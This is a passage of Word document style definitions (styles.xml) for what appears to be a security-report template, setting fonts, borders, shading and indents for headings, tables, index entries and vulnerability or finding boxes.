    <w:rsid w:val="008E2093"/>
    <w:pPr>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="80"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
      <w:sz w:val="18"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
    </w:tblPr>
    <w:trPr>
      <w:cantSplit/>
    </w:trPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:pPr>
        <w:keepNext/>
        <w:wordWrap/>
        <w:spacing w:beforeLines="0" w:beforeAutospacing="0" w:afterLines="0" w:afterAutospacing="0"/>
        <w:ind w:leftChars="0" w:left="0" w:rightChars="0" w:right="0" w:firstLineChars="0" w:firstLine="284"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="6"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps/>
        <w:color w:val="FFFFFF"/>
        <w:kern w:val="20"/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="12" w:space="0" w:color="000000"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="1F1083"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:wordWrap/>
      </w:pPr>
      <w:rPr>
        <w:i w:val="0"/>
        <w:iCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:tr2bl w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:i w:val="0"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:i w:val="0"/>
        <w:iCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:tr2bl w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps/>
        <w:vanish w:val="0"/>
        <w:sz w:val="20"/>
        <w14:shadow w14:blurRad="0" w14:dist="0" w14:dir="0" w14:sx="0" w14:sy="0" w14:kx="0" w14:ky="0" w14:algn="none">
          <w14:srgbClr w14:val="000000"/>
        </w14:shadow>
        <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
          <w14:noFill/>
          <w14:prstDash w14:val="solid"/>
          <w14:bevel/>
        </w14:textOutline>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="character" w:styleId="EndnoteReference">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00B30B04"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="EndnoteText">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00B30B04"/>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeHighlight">
    <w:name w:val="Code Highlight"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="006F0A71"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:b/>
      <w:noProof/>
      <w:color w:val="0000FF"/>
      <w:sz w:val="16"/>
      <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Referencereference">
    <w:name w:val="Reference (reference)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00FF042C"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:spacing w:after="120"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:spacing w:val="-5"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:semiHidden/>
    <w:rsid w:val="007145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uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="002A6FBA"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="NormalBold">
    <w:name w:val="Normal + Bold"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="000B3EA9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="RecommendationReference">
    <w:name w:val="RecommendationReference"/>
    <w:basedOn w:val="VulnerabilityReference"/>
    <w:uiPriority w:val="40"/>
    <w:rsid w:val="00E94071"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="1F1083"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w14:shadow w14:blurRad="0" w14:dist="0" w14:dir="0" w14:sx="0" w14:sy="0" w14:kx="0" w14:ky="0" w14:algn="none">
        <w14:srgbClr w14:val="000000"/>
      </w14:shadow>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="VulnerabilityReference">
    <w:name w:val="VulnerabilityReference"/>
    <w:basedOn w:val="Text"/>
    <w:next w:val="Text"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00E94071"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="auto" w:shadow="1"/>
        <w:left w:val="single" w:sz="4" w:space="4" w:color="auto" w:shadow="1"/>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto" w:shadow="1"/>
        <w:right w:val="single" w:sz="4" w:space="4" w:color="auto" w:shadow="1"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="CC0000"/>
      <w:spacing w:before="40" w:line="280" w:lineRule="atLeast"/>
      <w:ind w:firstLine="284"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:smallCaps/>
      <w:kern w:val="20"/>
      <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
        <w14:srgbClr w14:val="000000">
          <w14:alpha w14:val="60000"/>
        </w14:srgbClr>
      </w14:shadow>
      <w14:textFill>
        <w14:solidFill>
          <w14:srgbClr w14:val="FFFFFF"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="VulnerabilityReference"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="006C770A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="2180"/>
        <w:tab w:val="right" w:pos="8806"/>
        <w:tab w:val="right" w:pos="9910"/>
      </w:tabs>
      <w:spacing w:line="160" w:lineRule="atLeast"/>
      <w:ind w:left="1134" w:right="1134"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b w:val="0"/>
      <w:noProof/>
      <w:sz w:val="16"/>
      <w14:shadow w14:blurRad="0" w14:dist="0" w14:dir="0" w14:sx="0" w14:sy="0" w14:kx="0" w14:ky="0" w14:algn="none">
        <w14:srgbClr w14:val="000000"/>
      </w14:shadow>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="TOC6"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="007D0264"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="8F88C1"/>
      <w:ind w:left="1281"/>
    </w:pPr>
    <w:rPr>
      <w14:shadow w14:blurRad="0" w14:dist="0" w14:dir="0" w14:sx="0" w14:sy="0" w14:kx="0" w14:ky="0" w14:algn="none">
        <w14:srgbClr w14:val="000000"/>
      </w14:shadow>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="001A5BB7"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="2900"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8805"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9910"/>
      </w:tabs>
      <w:spacing w:before="60" w:after="120"/>
      <w:ind w:left="2127" w:right="1882" w:hanging="851"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times"/>
      <w:color w:val="999999"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableFindings">
    <w:name w:val="TableFindings"/>
    <w:basedOn w:val="TableSummary"/>
    <w:rsid w:val="008E2093"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:tblPr/>
    <w:tblStylePr w:type="firstRow">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:widowControl/>
        <w:wordWrap/>
        <w:spacing w:beforeLines="0" w:beforeAutospacing="0" w:afterLines="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="9"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Utopia Std Semibold" w:hAnsi="Utopia Std Semibold"/>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lastRow">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:wordWrap/>
      </w:pPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index2">
    <w:name w:val="index 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00B30B04"/>
    <w:pPr>
      <w:ind w:left="400" w:hanging="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index3">
    <w:name w:val="index 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00B30B04"/>
    <w:pPr>
      <w:ind w:left="600" w:hanging="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index4">
    <w:name w:val="index 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00B30B04"/>
    <w:pPr>
      <w:ind w:left="800" w:hanging="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index5">
    <w:name w:val="index 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00B30B04"/>
    <w:pPr>
      <w:ind w:left="1000" w:hanging="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index6">
    <w:name w:val="index 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00B30B04"/>
    <w:pPr>
      <w:ind w:left="1200" w:hanging="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index7">
    <w:name w:val="index 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00B30B04"/>
    <w:pPr>
      <w:ind w:left="1400" w:hanging="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index8">
    <w:name w:val="index 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00B30B04"/>
    <w:pPr>
      <w:ind w:left="1600" w:hanging="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index9">
    <w:name w:val="index 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00B30B04"/>
    <w:pPr>
      <w:ind w:left="1800" w:hanging="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="MacroText">
    <w:name w:val="macro"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00B30B0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noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofAuthorities">
    <w:name w:val="table of authorities"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00B30B04"/>
    <w:pPr>
      <w:ind w:left="200" w:hanging="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofFigures">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="98"/>
    <w:semiHidden/>
    <w:rsid w:val="00B30B04"/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableFindingsL2">
    <w:name w:val="TableFindingsL2"/>
    <w:basedOn w:val="TableFindings"/>
    <w:rsid w:val="008E2093"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:tblPr/>
    <w:tblStylePr w:type="firstRow">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:widowControl/>
        <w:wordWrap/>
        <w:spacing w:beforeLines="0" w:beforeAutospacing="0" w:afterLines="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="9"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>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999999"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:wordWrap/>
      </w:pPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListBullet2Char">
    <w:name w:val="List Bullet 2 Char"/>
    <w:basedOn w:val="TextCharChar"/>
    <w:link w:val="ListBullet2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00647853"/>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Appendix">
    <w:name w:val="Appendix"/>
    <w:basedOn w:val="Text"/>
    <w:next w:val="Text"/>
    <w:uiPriority w:val="5"/>
    <w:rsid w:val="007C6CB2"/>
    <w:pPr>
      <w:pageBreakBefore/>
      <w:numPr>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:spacing w:before="600" w:after="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="CC0000"/>
      <w:kern w:val="32"/>
      <w:sz w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Appendix2">
    <w:name w:val="Appendix 2"/>
    <w:basedOn w:val="Appendix"/>
    <w:next w:val="Text"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="007C6CB2"/>
    <w:pPr>
      <w:pageBreakBefore w:val="0"/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="0"/>
      </w:tabs>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Appendix3">
    <w:name w:val="Appendix 3"/>
    <w:basedOn w:val="Appendix"/>
    <w:next w:val="Text"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="007C6CB2"/>
    <w:pPr>
      <w:pageBreakBefore w:val="0"/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="0"/>
      </w:tabs>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="006213FC"/>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:eastAsia="Times" w:hAnsi="Utopia Std"/>
      <w:color w:val="CC0000"/>
      <w:kern w:val="32"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="ListParagraphChar"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00F165BB"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableModule1">
    <w:name w:val="TableModule1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="00F165BB"/>
    <w:pPr>
      <w:keepLines/>
      <w:spacing w:line="240" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>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vAlign w:val="center"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:pPr>
        <w:wordWrap/>
        <w:spacing w:beforeLines="0" w:before="100" w:beforeAutospacing="1" w:afterLines="0" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:rPr>
        <w:b w:val="0"/>
        <w:bCs/>
        <w:i w:val="0"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:insideV w:val="single" w:sz="6" w:space="0" w:color="000000"/>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pPr>
        <w:wordWrap/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:rPr>
        <w:b w:val="0"/>
        <w:bCs/>
        <w:i w:val="0"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:tl2br w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableModuleHeader1">
    <w:name w:val="TableModuleHeader1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="00F165BB"/>
    <w:pPr>
      <w:keepLines/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblBorders>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:pPr>
        <w:wordWrap/>
        <w:spacing w:beforeLines="0" w:before="100" w:beforeAutospacing="1" w:afterLines="0" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:i w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="single" w:sz="8" w:space="0" w:color="999999"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CaptionChar">
    <w:name w:val="Caption Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Caption"/>
    <w:uiPriority w:val="98"/>
    <w:rsid w:val="00683999"/>
    <w:rPr>
      <w:i/>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:link w:val="Subtitle"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="00227B2F"/>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std" w:cs="Arial"/>
      <w:color w:val="808080"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0084173B"/>
    <w:pPr>
      <w:keepLines/>
      <w:pageBreakBefore w:val="0"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="0"/>
        <w:tab w:val="clear" w:pos="500"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="0" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="author-g-nmk864ajngn3qm2j">
    <w:name w:val="author-g-nmk864ajngn3qm2j"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0084173B"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:rsid w:val="0084173B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Revision">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A03EA1"/>
    <w:rPr>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F22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GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
    <w:name w:val="HTML Preformatted Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="HTMLPreformatted"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F22354"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Hands-on">
    <w:name w:val="Hands-on"/>
    <w:basedOn w:val="Text"/>
    <w:link w:val="Hands-onChar"/>
    <w:uiPriority w:val="98"/>
    <w:qFormat/>
    <w:rsid w:val="007605A8"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        <w:bottom w:val="single" w:sz="18" w:space="1" w:color="auto"/>
        <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
      <w:spacing w:before="240" w:after="240"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="C00000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Hands-onChar">
    <w:name w:val="Hands-on Char"/>
    <w:basedOn w:val="TextCharChar"/>
    <w:link w:val="Hands-on"/>
    <w:uiPriority w:val="98"/>
    <w:rsid w:val="007605A8"/>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
      <w:color w:val="C00000"/>
      <w:szCs w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="hands-on0">
    <w:name w:val="hands-on"/>
    <w:basedOn w:val="Hands-on"/>
    <w:link w:val="hands-onChar0"/>
    <w:uiPriority w:val="98"/>
    <w:rsid w:val="007605A8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hands-onChar0">
    <w:name w:val="hands-on Char"/>
    <w:basedOn w:val="Hands-onChar"/>
    <w:link w:val="hands-on0"/>
    <w:uiPriority w:val="98"/>
    <w:rsid w:val="007605A8"/>
    <w:rPr>
      <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
      <w:color w:val="C00000"/>
      <w:szCs w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E7768"/>
    <w:rPr>
